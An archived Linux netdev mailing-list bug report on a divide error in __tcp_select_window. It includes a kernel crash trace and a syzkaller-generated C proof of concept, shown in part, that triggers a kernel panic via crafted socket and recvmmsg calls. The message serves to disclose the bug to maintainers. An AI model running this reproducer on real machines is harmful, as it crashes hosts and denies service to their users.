* net/ipv4: divide error in __tcp_select_window
@ 2017-08-31 5:56 idaifish
2017-08-31 11:11 ` Neal Cardwell
0 siblings, 1 reply; 4+ messages in thread
From: idaifish @ 2017-08-31 5:56 UTC (permalink / raw)
To: davem, Alexey Kuznetsov; +Cc: netdev, syzkaller
[-- Attachment #1: Type: text/plain, Size: 2622 bytes --]
Hi:
This bug seems still can be triggered by the attached PoC on latest
Ubuntu1604 (4.4.0-94-generic)
============================================================================
divide error: 0000 [#1] SMP KASAN
Modules linked in:
CPU: 0 PID: 14933 Comm: syz-executor0 Not tainted 4.9.45 #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
Ubuntu-1.8.2-1ubuntu1 04/01/2014
task: ffff880076ab9900 task.stack: ffff880062ae8000
RIP: 0010:[<ffffffff829c1df3>] [<ffffffff829c1df3>]
__tcp_select_window+0x2f3/0x6b0 net/ipv4/tcp_output.c:2499
RSP: 0018:ffff880062aef6e8 EFLAGS: 00010283
RAX: 00000000000000ac RBX: 0000000000000000 RCX: ffffc9000195b000
RDX: 0000000000000000 RSI: 0000000000000436 RDI: ffff880079add085
RBP: ffff880062aef728 R08: 0000000000001800 R09: 0000000000000002
R10: 0000000000000000 R11: 0000000000000000 R12: 00000000000000ac
R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000001
FS: 00007f15c239a700(0000) GS:ffff88007fc00000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 000000002001c000 CR3: 0000000079628000 CR4: 00000000000006f0
DR0: 0000000000008000 DR1: 0000000000008000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000600
Stack:
ffff880062aef6e8 ffff880062aef6e8 0000000000000000 ffff880079adca40
0000000000000000 0000000000000436 ffff880079adcae8 0000000000000436
ffff880062aef758 ffffffff8297c36e 0000000000000068 0000000000000000
Call Trace:
[<ffffffff8297c36e>] tcp_cleanup_rbuf+0x43e/0x4f0 net/ipv4/tcp.c:1468
[<ffffffff829815df>] tcp_recvmsg+0xc2f/0x25d0 net/ipv4/tcp.c:1937
[<ffffffff82a3c32e>] inet_recvmsg+0x26e/0x3b0 net/ipv4/af_inet.c:765
[<ffffffff827c84aa>] sock_recvmsg_nosec+0x8a/0xb0 net/socket.c:723
[<ffffffff827d0849>] ___sys_recvmsg+0x229/0x510 net/socket.c:2113
[<ffffffff827d25fe>] __sys_recvmmsg+0x23e/0x660 net/socket.c:2221
[<ffffffff827d2aff>] SYSC_recvmmsg net/socket.c:2302 [inline]
[<ffffffff827d2aff>] SyS_recvmmsg+0xdf/0x180 net/socket.c:2286
[<ffffffff82dfb3b7>] entry_SYSCALL_64_fastpath+0x1a/0xa9
Code: ec 7c 1f e8 b0 44 9d fe 44 3b 75 d4 75 c2 e8 a5 44 9d fe 8b 45
d0 44 01 e8 41 39 c4 41 0f 4f dc eb ae e8 91 44 9d fe 44 89 e0 99 <41>
f7 fe 41 0f af c6 89 c3 eb 9a e8 7d 44 9d fe 48 8d bb 91 04
RIP [<ffffffff829c1df3>] __tcp_select_window+0x2f3/0x6b0
net/ipv4/tcp_output.c:2499
RSP <ffff880062aef6e8>
---[ end trace 771dfab907a5c7aa ]---
Kernel panic - not syncing: Fatal exception
Kernel Offset: disabled
Rebooting in 86400 seconds..
================================================================================
--
Regards,
idaifish
[-- Attachment #2: report.txt --]
[-- Type: text/plain, Size: 2334 bytes --]
divide error: 0000 [#1] SMP KASAN
Modules linked in:
CPU: 0 PID: 14933 Comm: syz-executor0 Not tainted 4.9.45 #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
task: ffff880076ab9900 task.stack: ffff880062ae8000
RIP: 0010:[<ffffffff829c1df3>] [<ffffffff829c1df3>] __tcp_select_window+0x2f3/0x6b0 net/ipv4/tcp_output.c:2499
RSP: 0018:ffff880062aef6e8 EFLAGS: 00010283
RAX: 00000000000000ac RBX: 0000000000000000 RCX: ffffc9000195b000
RDX: 0000000000000000 RSI: 0000000000000436 RDI: ffff880079add085
RBP: ffff880062aef728 R08: 0000000000001800 R09: 0000000000000002
R10: 0000000000000000 R11: 0000000000000000 R12: 00000000000000ac
R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000001
FS: 00007f15c239a700(0000) GS:ffff88007fc00000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 000000002001c000 CR3: 0000000079628000 CR4: 00000000000006f0
DR0: 0000000000008000 DR1: 0000000000008000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000600
Stack:
ffff880062aef6e8 ffff880062aef6e8 0000000000000000 ffff880079adca40
0000000000000000 0000000000000436 ffff880079adcae8 0000000000000436
ffff880062aef758 ffffffff8297c36e 0000000000000068 0000000000000000
Call Trace:
[<ffffffff8297c36e>] tcp_cleanup_rbuf+0x43e/0x4f0 net/ipv4/tcp.c:1468
[<ffffffff829815df>] tcp_recvmsg+0xc2f/0x25d0 net/ipv4/tcp.c:1937
[<ffffffff82a3c32e>] inet_recvmsg+0x26e/0x3b0 net/ipv4/af_inet.c:765
[<ffffffff827c84aa>] sock_recvmsg_nosec+0x8a/0xb0 net/socket.c:723
[<ffffffff827d0849>] ___sys_recvmsg+0x229/0x510 net/socket.c:2113
[<ffffffff827d25fe>] __sys_recvmmsg+0x23e/0x660 net/socket.c:2221
[<ffffffff827d2aff>] SYSC_recvmmsg net/socket.c:2302 [inline]
[<ffffffff827d2aff>] SyS_recvmmsg+0xdf/0x180 net/socket.c:2286
[<ffffffff82dfb3b7>] entry_SYSCALL_64_fastpath+0x1a/0xa9
Code: ec 7c 1f e8 b0 44 9d fe 44 3b 75 d4 75 c2 e8 a5 44 9d fe 8b 45 d0 44 01 e8 41 39 c4 41 0f 4f dc eb ae e8 91 44 9d fe 44 89 e0 99 <41> f7 fe 41 0f af c6 89 c3 eb 9a e8 7d 44 9d fe 48 8d bb 91 04
RIP [<ffffffff829c1df3>] __tcp_select_window+0x2f3/0x6b0 net/ipv4/tcp_output.c:2499
RSP <ffff880062aef6e8>
---[ end trace 771dfab907a5c7aa ]---
Kernel panic - not syncing: Fatal exception
Kernel Offset: disabled
Rebooting in 86400 seconds..
[-- Attachment #3: poc.c --]
[-- Type: text/x-csrc, Size: 38406 bytes --]
// autogenerated by syzkaller (http://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <dirent.h>
#include <errno.h>
#include <pthread.h>
#include <setjmp.h>
#include <signal.h>
#include <stdarg.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
const int kFailStatus = 67;
const int kRetryStatus = 69;
__attribute__((noreturn)) static void doexit(int status)
{
volatile unsigned i;
syscall(__NR_exit_group, status);
for (i = 0;; i++) {
}
}
__attribute__((noreturn)) static void fail(const char* msg, ...)
{
int e = errno;
fflush(stdout);
va_list args;
va_start(args, msg);
vfprintf(stderr, msg, args);
va_end(args);
fprintf(stderr, " (errno %d)\n", e);
doexit((e == ENOMEM || e == EAGAIN) ? kRetryStatus : kFailStatus);
}
__attribute__((noreturn)) static void exitf(const char* msg, ...)
{
int e = errno;
fflush(stdout);
va_list args;
va_start(args, msg);
vfprintf(stderr, msg, args);
va_end(args);
fprintf(stderr, " (errno %d)\n", e);
doexit(kRetryStatus);
}
static __thread int skip_segv;
static __thread jmp_buf segv_env;
static void segv_handler(int sig, siginfo_t* info, void* uctx)
{
uintptr_t addr = (uintptr_t)info->si_addr;
const uintptr_t prog_start = 1 << 20;
const uintptr_t prog_end = 100 << 20;
if (__atomic_load_n(&skip_segv, __ATOMIC_RELAXED) &&
(addr < prog_start || addr > prog_end)) {
_longjmp(segv_env, 1);
}
doexit(sig);
for (;;) {
}
}
static void install_segv_handler()
{
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_handler = SIG_IGN;
syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8);
syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8);
memset(&sa, 0, sizeof(sa));
sa.sa_sigaction = segv_handler;
sa.sa_flags = SA_NODEFER | SA_SIGINFO;
sigaction(SIGSEGV, &sa, NULL);
sigaction(SIGBUS, &sa, NULL);
}
#define NONFAILING(...) \
{ \
__atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \
if (_setjmp(segv_env) == 0) { \
__VA_ARGS__; \
} \
__atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \
}
static void use_temporary_dir()
{
char tmpdir_template[] = "./syzkaller.XXXXXX";
char* tmpdir = mkdtemp(tmpdir_template);
if (!tmpdir)
fail("failed to mkdtemp");
if (chmod(tmpdir, 0777))
fail("failed to chmod");
if (chdir(tmpdir))
fail("failed to chdir");
}
static void remove_dir(const char* dir)
{
DIR* dp;
struct dirent* ep;
int iter = 0;
retry:
dp = opendir(dir);
if (dp == NULL) {
if (errno == EMFILE) {
exitf("opendir(%s) failed due to NOFILE, exiting");
}
exitf("opendir(%s) failed", dir);
}
while ((ep = readdir(dp))) {
if (strcmp(ep->d_name, ".") == 0 || strcmp(ep->d_name, "..") == 0)
continue;
char filename[FILENAME_MAX];
snprintf(filename, sizeof(filename), "%s/%s", dir, ep->d_name);
struct stat st;
if (lstat(filename, &st))
exitf("lstat(%s) failed", filename);
if (S_ISDIR(st.st_mode)) {
remove_dir(filename);
continue;
}
int i;
for (i = 0;; i++) {
if (unlink(filename) == 0)
break;
if (errno == EROFS) {
break;
}
if (errno != EBUSY || i > 100)
exitf("unlink(%s) failed", filename);
if (umount2(filename, MNT_DETACH))
exitf("umount(%s) failed", filename);
}
}
closedir(dp);
int i;
for (i = 0;; i++) {
if (rmdir(dir) == 0)
break;
if (i < 100) {
if (errno == EROFS) {
break;
}
if (errno == EBUSY) {
if (umount2(dir, MNT_DETACH))
exitf("umount(%s) failed", dir);
continue;
}
if (errno == ENOTEMPTY) {
if (iter < 100) {
iter++;
goto retry;
}
}
}
exitf("rmdir(%s) failed", dir);
}
}
static uint64_t current_time_ms()
{
struct timespec ts;
if (clock_gettime(CLOCK_MONOTONIC, &ts))
fail("clock_gettime failed");
return (uint64_t)ts.tv_sec * 1000 + (uint64_t)ts.tv_nsec / 1000000;
}
static void test();
void loop()
{
int iter;
for (iter = 0;; iter++) {
char cwdbuf[256];
sprintf(cwdbuf, "./%d", iter);
if (mkdir(cwdbuf, 0777))
fail("failed to mkdir");
int pid = fork();
if (pid < 0)
fail("clone failed");
if (pid == 0) {
prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0);
setpgrp();
if (chdir(cwdbuf))
fail("failed to chdir");
test();
doexit(0);
}
int status = 0;
uint64_t start = current_time_ms();
for (;;) {
int res = waitpid(-1, &status, __WALL | WNOHANG);
if (res == pid)
break;
usleep(1000);
if (current_time_ms() - start > 5 * 1000) {
kill(-pid, SIGKILL);
kill(pid, SIGKILL);
while (waitpid(-1, &status, __WALL) != pid) {
}
break;
}
}
remove_dir(cwdbuf);
}
}
long r[212];
void* thr(void* arg)
{
switch ((long)arg) {
case 0:
r[0] = syscall(__NR_mmap, 0x20000000ul, 0x1b000ul, 0x3ul, 0x32ul,
0xfffffffffffffffful, 0x0ul);
break;
case 1:
r[1] = syscall(__NR_socket, 0x2ul, 0x1ul, 0x0ul);
break;
case 2:
NONFAILING(*(uint32_t*)0x20018ffc = (uint32_t)0x0);
r[3] = syscall(__NR_setsockopt, r[1], 0x1ul, 0x8ul, 0x20018ffcul,
0x4ul);
break;
case 3:
NONFAILING(*(uint16_t*)0x20004000 = (uint16_t)0x2);
NONFAILING(*(uint16_t*)0x20004002 = (uint16_t)0x204e);
NONFAILING(*(uint32_t*)0x20004004 = (uint32_t)0x12000000);
NONFAILING(*(uint8_t*)0x20004008 = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x20004009 = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x2000400a = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x2000400b = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x2000400c = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x2000400d = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x2000400e = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x2000400f = (uint8_t)0x0);
r[15] = syscall(__NR_bind, r[1], 0x20004000ul, 0x10ul);
break;
case 4:
NONFAILING(*(uint16_t*)0x20003000 = (uint16_t)0x2);
NONFAILING(*(uint16_t*)0x20003002 = (uint16_t)0x204e);
NONFAILING(*(uint32_t*)0x20003004 = (uint32_t)0x100007f);
NONFAILING(*(uint8_t*)0x20003008 = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x20003009 = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x2000300a = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x2000300b = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x2000300c = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x2000300d = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x2000300e = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x2000300f = (uint8_t)0x0);
r[27] = syscall(__NR_connect, r[1], 0x20003000ul, 0x10ul);
break;
case 5:
r[28] = syscall(__NR_mmap, 0x2001c000ul, 0x1000ul, 0x1ul, 0x32ul,
0xfffffffffffffffful, 0x0ul);
break;
case 6:
r[29] = syscall(__NR_mmap, 0x2001d000ul, 0x1000ul, 0x3ul, 0x32ul,
0xfffffffffffffffful, 0x0ul);
break;
case 7:
r[30] = syscall(__NR_mmap, 0x20022000ul, 0x1000ul, 0x3ul, 0x32ul,
0xfffffffffffffffful, 0x0ul);
break;
case 8:
r[31] = syscall(__NR_mmap, 0x20023000ul, 0x1000ul, 0x3ul, 0x32ul,
0xfffffffffffffffful, 0x0ul);
break;
case 9:
r[32] = syscall(__NR_mmap, 0x2002b000ul, 0x1000ul, 0x3ul, 0x32ul,
0xfffffffffffffffful, 0x0ul);
break;
case 10:
NONFAILING(*(uint64_t*)0x2002bdc0 = (uint64_t)0x20000000);
NONFAILING(*(uint32_t*)0x2002bdc8 = (uint32_t)0x8);
NONFAILING(*(uint64_t*)0x2002bdd0 = (uint64_t)0x20022fa0);
NONFAILING(*(uint64_t*)0x2002bdd8 = (uint64_t)0x6);
NONFAILING(*(uint64_t*)0x2002bde0 = (uint64_t)0x20022000);
NONFAILING(*(uint64_t*)0x2002bde8 = (uint64_t)0x0);
NONFAILING(*(uint32_t*)0x2002bdf0 = (uint32_t)0x0);
NONFAILING(*(uint32_t*)0x2002bdf8 = (uint32_t)0x101);
NONFAILING(*(uint64_t*)0x2002be00 = (uint64_t)0x20023ff0);
NONFAILING(*(uint32_t*)0x2002be08 = (uint32_t)0x10);
NONFAILING(*(uint64_t*)0x2002be10 = (uint64_t)0x20001000);
NONFAILING(*(uint64_t*)0x2002be18 = (uint64_t)0x6);
NONFAILING(*(uint64_t*)0x2002be20 = (uint64_t)0x2000d000);
NONFAILING(*(uint64_t*)0x2002be28 = (uint64_t)0x0);
NONFAILING(*(uint32_t*)0x2002be30 = (uint32_t)0x6);
NONFAILING(*(uint32_t*)0x2002be38 = (uint32_t)0x80000000);
NONFAILING(*(uint64_t*)0x2002be40 = (uint64_t)0x20024ffa);
NONFAILING(*(uint32_t*)0x2002be48 = (uint32_t)0x6);
NONFAILING(*(uint64_t*)0x2002be50 = (uint64_t)0x2001f000);
NONFAILING(*(uint64_t*)0x2002be58 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x2002be60 = (uint64_t)0x20024000);
NONFAILING(*(uint64_t*)0x2002be68 = (uint64_t)0x0);
NONFAILING(*(uint32_t*)0x2002be70 = (uint32_t)0x2);
NONFAILING(*(uint32_t*)0x2002be78 = (uint32_t)0x4);
NONFAILING(*(uint64_t*)0x2002be80 = (uint64_t)0x20025000);
NONFAILING(*(uint32_t*)0x2002be88 = (uint32_t)0x10);
NONFAILING(*(uint64_t*)0x2002be90 = (uint64_t)0x20009000);
NONFAILING(*(uint64_t*)0x2002be98 = (uint64_t)0x1);
NONFAILING(*(uint64_t*)0x2002bea0 = (uint64_t)0x20025fe7);
NONFAILING(*(uint64_t*)0x2002bea8 = (uint64_t)0x0);
NONFAILING(*(uint32_t*)0x2002beb0 = (uint32_t)0x8);
NONFAILING(*(uint32_t*)0x2002beb8 = (uint32_t)0x101);
NONFAILING(*(uint64_t*)0x2002bec0 = (uint64_t)0x20025000);
NONFAILING(*(uint32_t*)0x2002bec8 = (uint32_t)0x58);
NONFAILING(*(uint64_t*)0x2002bed0 = (uint64_t)0x2000cfb0);
NONFAILING(*(uint64_t*)0x2002bed8 = (uint64_t)0x5);
NONFAILING(*(uint64_t*)0x2002bee0 = (uint64_t)0x20026000);
NONFAILING(*(uint64_t*)0x2002bee8 = (uint64_t)0x0);
NONFAILING(*(uint32_t*)0x2002bef0 = (uint32_t)0xffff);
NONFAILING(*(uint32_t*)0x2002bef8 = (uint32_t)0x46);
NONFAILING(*(uint64_t*)0x2002bf00 = (uint64_t)0x20027ffa);
NONFAILING(*(uint32_t*)0x2002bf08 = (uint32_t)0x6);
NONFAILING(*(uint64_t*)0x2002bf10 = (uint64_t)0x20004f90);
NONFAILING(*(uint64_t*)0x2002bf18 = (uint64_t)0x7);
NONFAILING(*(uint64_t*)0x2002bf20 = (uint64_t)0x20016000);
NONFAILING(*(uint64_t*)0x2002bf28 = (uint64_t)0x0);
NONFAILING(*(uint32_t*)0x2002bf30 = (uint32_t)0x6);
NONFAILING(*(uint32_t*)0x2002bf38 = (uint32_t)0x1ff);
NONFAILING(*(uint64_t*)0x2002bf40 = (uint64_t)0x20000ff0);
NONFAILING(*(uint32_t*)0x2002bf48 = (uint32_t)0x10);
NONFAILING(*(uint64_t*)0x2002bf50 = (uint64_t)0x20028000);
NONFAILING(*(uint64_t*)0x2002bf58 = (uint64_t)0x5);
NONFAILING(*(uint64_t*)0x2002bf60 = (uint64_t)0x20017000);
NONFAILING(*(uint64_t*)0x2002bf68 = (uint64_t)0x0);
NONFAILING(*(uint32_t*)0x2002bf70 = (uint32_t)0x3);
NONFAILING(*(uint32_t*)0x2002bf78 = (uint32_t)0x6);
NONFAILING(*(uint64_t*)0x2002bf80 = (uint64_t)0x2001c000);
NONFAILING(*(uint32_t*)0x2002bf88 = (uint32_t)0x10);
NONFAILING(*(uint64_t*)0x2002bf90 = (uint64_t)0x2000bfc0);
NONFAILING(*(uint64_t*)0x2002bf98 = (uint64_t)0x4);
NONFAILING(*(uint64_t*)0x2002bfa0 = (uint64_t)0x20029fdf);
NONFAILING(*(uint64_t*)0x2002bfa8 = (uint64_t)0x0);
NONFAILING(*(uint32_t*)0x2002bfb0 = (uint32_t)0x4);
NONFAILING(*(uint32_t*)0x2002bfb8 = (uint32_t)0x0);
NONFAILING(*(uint64_t*)0x2002bfc0 = (uint64_t)0x20015b87);
NONFAILING(*(uint32_t*)0x2002bfc8 = (uint32_t)0x10);
NONFAILING(*(uint64_t*)0x2002bfd0 = (uint64_t)0x20000000);
NONFAILING(*(uint64_t*)0x2002bfd8 = (uint64_t)0x5);
NONFAILING(*(uint64_t*)0x2002bfe0 = (uint64_t)0x20012f3f);
NONFAILING(*(uint64_t*)0x2002bfe8 = (uint64_t)0x0);
NONFAILING(*(uint32_t*)0x2002bff0 = (uint32_t)0x51d);
NONFAILING(*(uint32_t*)0x2002bff8 = (uint32_t)0x400);
NONFAILING(*(uint64_t*)0x20022fa0 = (uint64_t)0x20002000);
NONFAILING(*(uint64_t*)0x20022fa8 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20022fb0 = (uint64_t)0x20001f9c);
NONFAILING(*(uint64_t*)0x20022fb8 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20022fc0 = (uint64_t)0x20000000);
NONFAILING(*(uint64_t*)0x20022fc8 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20022fd0 = (uint64_t)0x2001d000);
NONFAILING(*(uint64_t*)0x20022fd8 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20022fe0 = (uint64_t)0x20009000);
NONFAILING(*(uint64_t*)0x20022fe8 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20022ff0 = (uint64_t)0x20005fd1);
NONFAILING(*(uint64_t*)0x20022ff8 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20001000 = (uint64_t)0x2001d000);
NONFAILING(*(uint64_t*)0x20001008 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20001010 = (uint64_t)0x20016f90);
NONFAILING(*(uint64_t*)0x20001018 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20001020 = (uint64_t)0x20000000);
NONFAILING(*(uint64_t*)0x20001028 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20001030 = (uint64_t)0x20023000);
NONFAILING(*(uint64_t*)0x20001038 = (uint64_t)0x1000);
NONFAILING(*(uint64_t*)0x20001040 = (uint64_t)0x20023f80);
NONFAILING(*(uint64_t*)0x20001048 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20001050 = (uint64_t)0x20021000);
NONFAILING(*(uint64_t*)0x20001058 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20009000 = (uint64_t)0x20020000);
NONFAILING(*(uint64_t*)0x20009008 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x2000cfb0 = (uint64_t)0x2000d000);
NONFAILING(*(uint64_t*)0x2000cfb8 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x2000cfc0 = (uint64_t)0x20026f0e);
NONFAILING(*(uint64_t*)0x2000cfc8 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x2000cfd0 = (uint64_t)0x20026fcc);
NONFAILING(*(uint64_t*)0x2000cfd8 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x2000cfe0 = (uint64_t)0x20026000);
NONFAILING(*(uint64_t*)0x2000cfe8 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x2000cff0 = (uint64_t)0x2000b000);
NONFAILING(*(uint64_t*)0x2000cff8 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20004f90 = (uint64_t)0x20027f2c);
NONFAILING(*(uint64_t*)0x20004f98 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20004fa0 = (uint64_t)0x2000a000);
NONFAILING(*(uint64_t*)0x20004fa8 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20004fb0 = (uint64_t)0x20027ff3);
NONFAILING(*(uint64_t*)0x20004fb8 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20004fc0 = (uint64_t)0x20027000);
NONFAILING(*(uint64_t*)0x20004fc8 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20004fd0 = (uint64_t)0x20009ff4);
NONFAILING(*(uint64_t*)0x20004fd8 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20004fe0 = (uint64_t)0x2001d000);
NONFAILING(*(uint64_t*)0x20004fe8 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20004ff0 = (uint64_t)0x20005000);
NONFAILING(*(uint64_t*)0x20004ff8 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20028000 = (uint64_t)0x20028fb6);
NONFAILING(*(uint64_t*)0x20028008 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20028010 = (uint64_t)0x20008000);
NONFAILING(*(uint64_t*)0x20028018 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20028020 = (uint64_t)0x20028000);
NONFAILING(*(uint64_t*)0x20028028 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20028030 = (uint64_t)0x20028fa9);
NONFAILING(*(uint64_t*)0x20028038 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20028040 = (uint64_t)0x20001000);
NONFAILING(*(uint64_t*)0x20028048 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x2000bfc0 = (uint64_t)0x20029000);
NONFAILING(*(uint64_t*)0x2000bfc8 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x2000bfd0 = (uint64_t)0x2001c000);
NONFAILING(*(uint64_t*)0x2000bfd8 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x2000bfe0 = (uint64_t)0x20029000);
NONFAILING(*(uint64_t*)0x2000bfe8 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x2000bff0 = (uint64_t)0x20029f28);
NONFAILING(*(uint64_t*)0x2000bff8 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20000000 = (uint64_t)0x20028000);
NONFAILING(*(uint64_t*)0x20000008 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20000010 = (uint64_t)0x20001fc9);
NONFAILING(*(uint64_t*)0x20000018 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20000020 = (uint64_t)0x2002a000);
NONFAILING(*(uint64_t*)0x20000028 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20000030 = (uint64_t)0x2002af4c);
NONFAILING(*(uint64_t*)0x20000038 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20000040 = (uint64_t)0x2002af80);
NONFAILING(*(uint64_t*)0x20000048 = (uint64_t)0x0);
r[183] = syscall(__NR_recvmmsg, r[1], 0x2002bdc0ul, 0x9ul, 0x102ul,
0x20000000ul);
break;
case 11:
NONFAILING(*(uint64_t*)0x20007000 = (uint64_t)0x2000e67e);
NONFAILING(*(uint64_t*)0x20007008 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20007010 = (uint64_t)0x20012f53);
NONFAILING(*(uint64_t*)0x20007018 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20007020 = (uint64_t)0x20007fb7);
NONFAILING(*(uint64_t*)0x20007028 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20007030 = (uint64_t)0x20013f86);
NONFAILING(*(uint64_t*)0x20007038 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20007040 = (uint64_t)0x20014000);
NONFAILING(*(uint64_t*)0x20007048 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20007050 = (uint64_t)0x20015fc7);
NONFAILING(*(uint64_t*)0x20007058 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20007060 = (uint64_t)0x20000000);
NONFAILING(*(uint64_t*)0x20007068 = (uint64_t)0x1000);
NONFAILING(memcpy(
(void*)0x20000000,
"\x12\x33\x6d\xe8\x81\xf2\x48\x71\xc3\x65\x47\xbb\xde\x16\xca"
"\xae\x15\x0d\x5b\x32\x92\x0a\xb0\x85\x24\x88\xec\x30\xb7\xc2"
"\x73\x57\xaf\xeb\xa2\xe4\x62\x8e\x76\xd7\xea\x1a\x78\x35\xa3"
"\x3d\x66\x9e\x49\xe1\xf5\x44\xa9\x30\x2e\x82\x0f\xca\xdb\xa3"
"\xde\xc3\x55\x3d\xad\x18\x54\xc8\x63\x04\x9c\x73\xd2\xba\x18"
"\x4b\xdf\x1c\x7a\x05\xd3\xa8\x34\x1e\xbe\x1a\xd6\x94\x76\x04"
"\xc8\xe8\x5a\x40\x13\xf6\x2e\x85\x81\x54\xb4\x09\x19\xf0\x77"
"\xaa\x94\xb6\x78\xa1\xa7\xe9\x5a\x30\xcd\xab\xcf\x10\x93\x43"
"\x8a\xd6\x2c\x5e\xea\x6b\x1c\x73\x04\xd1\xc6\x66\xfa\x32\xc4"
"\xc8\xe2\x12\x6a\x78\x93\xf0\x06\xdc\x83\x1e\x8d\xb4\xc4\xb9"
"\x17\xd4\x38\x56\x99\xf9\xce\x01\x4f\xb4\xd4\xac\x00\xa9\x9c"
"\x9d\x49\xa2\xb0\xca\x40\x8e\x53\xd8\x85\xee\x2a\x9a\x29\xaa"
"\xb6\x5b\x58\x30\x14\x44\x2f\x28\x34\xf7\x7a\x00\xca\x78\xf1"
"\x00\x00\xc1\xe7\x56\x05\x72\x52\xf8\x3c\xe5\x07\x0d\x44\xe6"
"\xc2\xbc\x20\x35\x4a\x17\xc6\x59\x38\xc1\x3e\x42\xc4\xc8\xfd"
"\x16\xc0\xd3\x26\xbf\xb1\x20\x09\x40\xe3\xbd\xb4\xfc\xc9\xa3"
"\xb0\x23\xbe\x56\x78\x96\x40\xcc\xef\x3d\x52\x95\xd3\x47\xbd"
"\x75\xa3\x2c\x5f\xd9\x4e\x12\xbe\xcf\xbb\x4e\x2e\xf7\x14\xa4"
"\x17\x99\x18\x47\xe8\x2c\x78\x12\x3c\x82\xa3\x3b\xbf\xf4\xe2"
"\x4d\x05\xb7\x4d\x3e\x03\x7a\xe9\x82\x94\xab\xf4\x35\x16\x2b"
"\x4b\x2d\x6b\x43\x4e\x80\xb2\x8e\xf5\x63\x03\x3d\x45\x57\x94"
"\xe8\x8a\xb0\xcd\xc5\x5f\x2e\x61\x95\xa4\xd8\x52\x20\x39\x6f"
"\xb3\xab\x5d\x7f\x53\xcd\x99\x44\x99\x13\xc5\x09\x9a\xd2\xa8"
"\x7a\x44\xbf\xf0\x31\xaa\xd8\x0b\xcc\xe4\x0d\x9e\x38\x9c\xa5"
"\xcf\x06\x71\xbd\x5c\x0b\x2d\xcb\xea\x5b\x8c\xf6\x20\x85\xe1"
"\x0b\xa2\xf2\xd7\xa2\x54\x66\x2d\xcc\x72\x3a\x2a\x2f\x5d\x77"
